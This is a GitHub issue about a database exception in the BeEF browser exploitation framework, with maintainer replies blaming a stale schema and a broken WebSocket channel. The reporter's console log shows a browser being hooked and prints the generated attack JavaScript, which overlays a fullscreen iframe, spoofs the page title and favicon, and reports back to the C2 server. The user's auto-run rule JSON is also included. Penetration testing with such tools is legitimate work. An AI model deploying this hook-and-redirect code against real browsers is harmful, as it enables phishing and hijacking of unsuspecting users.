Error: unknown attribute 'session' for BeEF::Core::Models::Execution when trying to add ARE rules #2068
Comments
This implies that the database was not setup properly. This issue was created back when the database was reworked to replace DataMapper with ActiveRecord. I suspect wiping the database would resolve this issue. The database can be reset by deleting the database file (
Your ARE rule worked fine for me when using XHR for command and control. WebSockets are effectively broken. A review of the WebSockets command and control channel is tracked in #2781. Closing this issue. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Summary
Q: Please provide a brief summary of the issue that you experienced.
A: Attempted to add an ARE rule, loaded successfully, but threw exception when hooked client appeared.
Environment
BeEF Version:
0.5.0.0
Ruby Version:
ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [x86_64-linux-gnu]
Browser Details (e.g. Chrome v81.0):
Firefox 78.8.0esr
Operating System (e.g. OSX Catalina):
Kali linux 2021.1
Configuration
Q: Have you made any changes to your BeEF configuration?
A: Yes, enabled WebSocket. Outcome is the same if disabled.
Q: Have you enabled or disabled any BeEF extensions?
A: Yes
Expected vs. Actual Behaviour
Expected Behaviour:
ARE executing the module defined
Actual Behaviour:
Throws exception, retries, throws exception
Additional Information
Beef console output:
[16:01:34][] BeEF is loading. Wait a few seconds...
[16:01:35][>] Server: mounted handler '/hook.js'
[16:01:35][>] Server: mounted handler '/init'
[16:01:35][>] Server: mounted handler '/'
[16:01:35][>] Server: mounted handler '/dh'
[16:01:35][>] Server: mounted handler '/api/hooks'
[16:01:35][>] Server: mounted handler '/api/browserdetails'
[16:01:35][>] Server: mounted handler '/api/modules'
[16:01:35][>] Server: mounted handler '/api/categories'
[16:01:35][>] Server: mounted handler '/api/logs'
[16:01:35][>] Server: mounted handler '/api/admin'
[16:01:35][>] Server: mounted handler '/api/server'
[16:01:35][>] Server: mounted handler '/api/autorun'
[16:01:35][>] Server: mounted handler '/demos'
[16:01:35][>] Server: mounted handler '/demos/butcher/index.html'
[16:01:35][>] Server: mounted handler '/demos/secret_page.html'
[16:01:35][>] Server: mounted handler '/demos/basic.html'
[16:01:35][>] Server: mounted handler '/demos/report.html'
[16:01:35][>] Server: mounted handler '/demos/clickjacking/clickjack_attack.html'
[16:01:35][>] Server: mounted handler '/demos/clickjacking/clickjack_victim.html'
[16:01:35][>] Server: mounted handler '/demos/plain.html'
[16:01:35][>] Server: mounted handler '/ui/authentication'
[16:01:35][>] Server: mounted handler '/ui/modules'
[16:01:35][>] Server: mounted handler '/ui/panel'
[16:01:35][>] Server: mounted handler '/ui/media'
[16:01:35][>] [AdminUI] Initializing admin panel ...
[16:01:35][>] [AdminUI] Minifying web_ui_all (384610 bytes)
[16:01:38][>] [AdminUI] Minified web_ui_all (216111 bytes)
[16:01:38][>] [AdminUI] Minifying web_ui_auth (1787 bytes)
[16:01:39][>] [AdminUI] Minified web_ui_auth (1122 bytes)
[16:01:39][>] Server: mounted handler '/ui/web_ui_all.js'
[16:01:39][>] Server: mounted handler '/ui/web_ui_auth.js'
[16:01:39][>] Server: mounted handler '/api/network'
[16:01:39][>] Server: mounted handler '/event'
[16:01:39][>] Server: mounted handler '/api/proxy'
[16:01:39][>] Server: mounted handler '/api/seng'
[16:01:39][>] Server: mounted handler '/ps'
[16:01:39][] 6 extensions enabled:
[16:01:39] | Demos
[16:01:39] | Admin UI
[16:01:39] | Network
[16:01:39] | Events
[16:01:39] | Proxy
[16:01:39] |_ Social Engineering
[16:01:39][] 303 modules enabled.
[16:01:39][] 2 network interfaces were detected.
[16:01:39][] running on network interface: 127.0.0.1
[16:01:39] | Hook URL: http://127.0.0.1:3000/hook.js
[16:01:39] |_ UI URL: http://127.0.0.1:3000/ui/panel
[16:01:39][] running on network interface: 192.168.1.70
[16:01:39] | Hook URL: http://192.168.1.70:3000/hook.js
[16:01:39] |_ UI URL: http://192.168.1.70:3000/ui/panel
[16:01:39][] RESTful API key: d2884a567449945b4089757ff029d8e39cf6df40
[16:01:39][] HTTP Proxy: http://127.0.0.1:6789
[16:01:39][>] [ARE] Processing rule: /usr/share/beef-xss/./arerules/enabled/iframe_redirect.json
[16:01:39][>] Server: mounted handler '/command/site_redirect_iframe.js'
[16:01:39][>] Hard Load module: 'site_redirect_iframe'
[16:01:39][] [ARE] Ruleset (Redirect Browser (iFrame)) parsed and stored successfully.
[16:01:39] |_ Target Browser: ALL (ALL)
[16:01:39] |_ Target OS: ALL (ALL)
[16:01:39] |_ Modules to Trigger:
[16:01:39] |_ () Name: site_redirect_iframe
[16:01:39] |_ () Condition:
[16:01:39] |_ () Code:
[16:01:39] |_ () Options:
[16:01:39] |_ iframe_title: (Site)
[16:01:39] |_ iframe_favicon: (https://www.site.com/favicon.ico)
[16:01:39] |_ iframe_src: (https://www.site.com/)
[16:01:39] |_ iframe_timeout: (3500)
[16:01:39] |_ Exec order: [0]
[16:01:39] |_ Exec delay: [0]
[16:01:39][] Starting WebSocket server ws://0.0.0.0:61985 [timer: 1000]
[16:01:39][] BeEF server started (press control+c to stop)
[16:01:54][>] Event: User with ip 127.0.0.1 has successfully authenticated in the application.
[16:02:05][>] [INIT] Processing Browser Details...
[16:02:05][>] Event: 192.168.1.70 just joined the horde from the domain: localhost:80
[16:02:05][!] [Browser Details] Invalid browser plugins returned from the hook browser's initial connection.
[16:02:05][] New Hooked Browser [id:1, ip:192.168.1.70, browser:FF-78, os:Linux-], hooked domain [localhost:80]
[16:02:05][>] Hooked browser has network interface 127.0.0.1
[16:02:05][>] [WebSocket] New WebSocket channel open.
[16:02:05][>] [WebSocket] Browser says helo! WebSocket is running
[16:02:05][>] [WebSocket] activeSocket content [{"TIKrTJAlaRYYIl9ukELP8trdGpOQPfl3t9OOIuw7mXRUdPsgUfWLDUqua4QBSi2xdtrmceuAZpMw4Lrl"=>#<EventMachine::WebSocket::Connection:0x00005644090e7a38 @Signature=52, @options={:host=>"0.0.0.0", :port=>61985, :secure=>false}, @debug=false, @secure=false, @secure_proxy=false, @tls_options={}, @close_timeout=nil, @handler=#<EventMachine::WebSocket::Handler13:0x00005644090e5198 @connection=#<EventMachine::WebSocket::Connection:0x00005644090e7a38 ...>, @debug=false, @State=:connected, @close_timer=nil, @DaTa="", @application_data_buffer="", @frame_type=nil>, @onopen=#<Proc:0x00005644090e78d0 /usr/share/beef-xss/core/main/network_stack/websocket/websocket.rb:81>, @onerror=#<Proc:0x00005644090e78a8 /usr/share/beef-xss/core/main/network_stack/websocket/websocket.rb:85>, @onclose=#<Proc:0x00005644090e7880 /usr/share/beef-xss/core/main/network_stack/websocket/websocket.rb:89>, @OnMessage=#<Proc:0x00005644090e7858 /usr/share/beef-xss/core/main/network_stack/websocket/websocket.rb:93>, @handshake=nil>}]
[16:02:05][*] [ARE] Checking if any defined rules should be triggered on target.
[16:02:05] |_ Browser version check -> (hook) 78 ALL (rule) : true
[16:02:05] |_ OS version check -> (hook) ALL (rule): true
[16:02:05] |_ Hooked browser and OS type/version MATCH rule: Redirect Browser (iFrame).
[16:02:05] |_ Found [1/1] ARE rules matching the hooked browser type/version.
[16:02:05] |_ Preparing JS for command id [1], module [site_redirect_iframe]
[16:02:05] | Final Modules Wrapper:
[16:02:05] |
[16:02:05] | var site_redirect_iframe_7262779878 = function(){
[16:02:05] | beef.execute(function() {
[16:02:05] |
[16:02:05] | var result = 'Iframe successfully created!';
[16:02:05] | var title = 'Site';
[16:02:05] | var iframe_src = 'https://www.site.com';
[16:02:05] | var iframe_favicon = 'https://www.site.com/favicon.ico';
[16:02:05] | var sent = false;
[16:02:05] |
[16:02:05] | $j("iframe").remove();
[16:02:05] |
[16:02:05] | beef.dom.createIframe('fullscreen', {'src':iframe_src}, {}, function() { if(!sent) { sent = true; document.title = title; beef.net.send('/command/site_redirect_iframe.js', 1, 'result='+result); } });
[16:02:05] | document.body.scroll = "no";
[16:02:05] | document.documentElement.style.overflow = 'hidden';
[16:02:05] | beef.browser.changeFavicon(iframe_favicon);
[16:02:05] |
[16:02:05] | setTimeout(function() {
[16:02:05] | if(!sent) {
[16:02:05] | result = 'Iframe failed to load, timeout';
[16:02:05] | beef.net.send('/command/site_redirect_iframe.js', 1, 'result='+result);
[16:02:05] | document.title = iframe_src + " is not available";
[16:02:05] | sent = true;
[16:02:05] | }
[16:02:05] | }, 3500);
[16:02:05] |
[16:02:05] | });
[16:02:05] | };
[16:02:05] | var site_redirect_iframe_7262779878_can_exec = false;
[16:02:05] | var site_redirect_iframe_7262779878_mod_output = null;
[16:02:05] |
[16:02:05] |_ setTimeout(function(){site_redirect_iframe_7262779878();}, 0);
[16:02:05][!] [WebSocket] Error: unknown attribute 'session' for BeEF::Core::Models::Execution.
[16:02:05][!] [WebSocket] Error: SQLite3::SQLException: no such column: executions.session
[16:02:05][>] [WebSocket] Connection closed: {:code=>3000, :reason=>"Application error", :was_clean=>true}
My ARE rule json:
{"name": "Redirect Browser (iFrame)",
"author": "author",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "site_redirect_iframe",
"condition": null,
"options": {
"iframe_title": "Site",
"iframe_favicon": "https://www.site.com/favicon.ico",
"iframe_src": "https://www.site.com/",
"iframe_timeout": "3500"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
The text was updated successfully, but these errors were encountered: